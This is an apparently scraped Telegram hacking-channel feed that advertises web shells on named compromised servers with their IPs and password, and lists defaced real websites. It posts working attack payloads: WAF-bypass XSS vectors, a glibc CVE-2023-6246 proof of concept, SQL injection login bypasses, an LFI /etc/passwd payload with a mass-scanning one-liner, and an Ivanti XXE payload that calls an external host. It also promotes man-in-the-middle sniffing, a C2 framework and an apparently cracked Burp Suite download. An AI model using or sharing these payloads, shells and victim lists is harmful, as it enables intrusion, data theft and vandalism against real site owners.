PHP: 7.0.33
Safe Mode: OFF
ServerIP: 208.109.13.219 [🇸🇬]
HDD: Total:149.99 GB
Free:28.53 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gzip nc
Downloader: wgetl ynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
pwd: bugcod3
Enjoy... ⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 208.109.13.219 [🇸🇬]
HDD: Total:149.99 GB
Free:28.53 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gzip nc
Downloader: wgetl ynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
pwd: bugcod3
Enjoy... ⭐️
#Shell
Please open Telegram to view this post
VIEW IN TELEGRAM
http://buildingtheblocks.life/
https://acmroofquote.com/BugCod3.html
http://ampacplumber.org/
http://bovbiz.com/
http://bucketwishconnection.com/
http://dailyhomesolutions.net/
https://dev1.shhdev.info/
http://dxperformance.com/
http://dxperformanceai.com/
http://eganpaintingpgh.com/
http://favoritedaycleaning.com/
http://fortuiteacafe.com/
http://goodworkstreeandlawn.com/
http://hirshcandies.com/
http://mind4mfg.com/
http://missionpso.org/
http://rlholliday.com/
http://shhdev.info/
http://shoreshdavid.com/
http://sunindustrial.dxpdev.site/
http://thepayrollshoppe.com/
http://trebedesign.com/
http://workbusinesssolutions.com/
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
PHP: 8.2.15
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
Please open Telegram to view this post
VIEW IN TELEGRAM
Akamai WAF
Vector PoC
#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>Vector PoC
#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog
POC :
(exec -a "
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
POC :
(exec -a "
printf '%0128000x' 1" /usr/bin/su < /dev/null)#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
javascript:var{a:onerror}={a:alert};throw%20document.domain#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
[+] FIlter bypass techniques:
Sometimes you can do amazing things just by appending /? to bypass access control restrictions
POC:
#AEMSecurity #FilterBypass #bugbountytips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
Sometimes you can do amazing things just by appending /? to bypass access control restrictions
POC:
https://targetdomain/api/endpoint <-- Access Deniedhttps://targetdomain/api/endpoint/? <--- Access to entire customer database#AEMSecurity #FilterBypass #bugbountytips
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload
#VPD #BugBounty #security
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
Payload
' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay#VPD #BugBounty #security
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.
cd PacketSpy
pip install -r requirements.txt
python3 packetspy.py --help
#Device Detection
python3 packetspy.py -tf 10.0.2.0/24 -i eth0
#Man-in-the-Middle Sniffing
python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
LearnExploit#Python #Network #Packet #Sniffing #Tools
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/
Country:
#Deface
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
PHP: 8.1.27
Safe Mode: OFF
ServerIP: 213.158.95.90 [🇮🇹 ]
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
🔗 Link
Enjoy...⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 213.158.95.90 [
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
Enjoy...
#Shell
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
CloudFlare Bypass
#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
<Img Src=OnXSS OnError=alert(1)>#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
LFI Payload⚡️
Payload:
#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
LFI Payload⚡️ Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" #LFI #Payload —————— 0Day.Today @LearnExploit @Tech_Army
Sick Finding 🥵⚡️
#tip
——————
0Day.Today
@LearnExploit
@Tech_Army
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000 -nc -path ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" -mr "root:x" | tee -a p1s.txt#tip
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-22024 - XXE on Ivanti Connect Secure
payload encoded base64:
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh
#Hacktoberfest #C2 #Redteam #Infrastructure
Please open Telegram to view this post
VIEW IN TELEGRAM
cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
#Cloudflare #Bugbounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>#Cloudflare #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
burpsuite_pro_v2024.zip
692.2 MB
Burp Suite Version 2024 🔻
❌ نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت .✔️
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudflare WAF Bypass Leads to Reflected XSS ®️
Payload Used :⛔
Payload Used :
#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Used :
"><img src=x onerror=alert(1)> [Blocked By Cloudflare] Payload Used :
"><img src=x onerrora=confirm() onerror=confirm(1)> [XSS Popup]#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM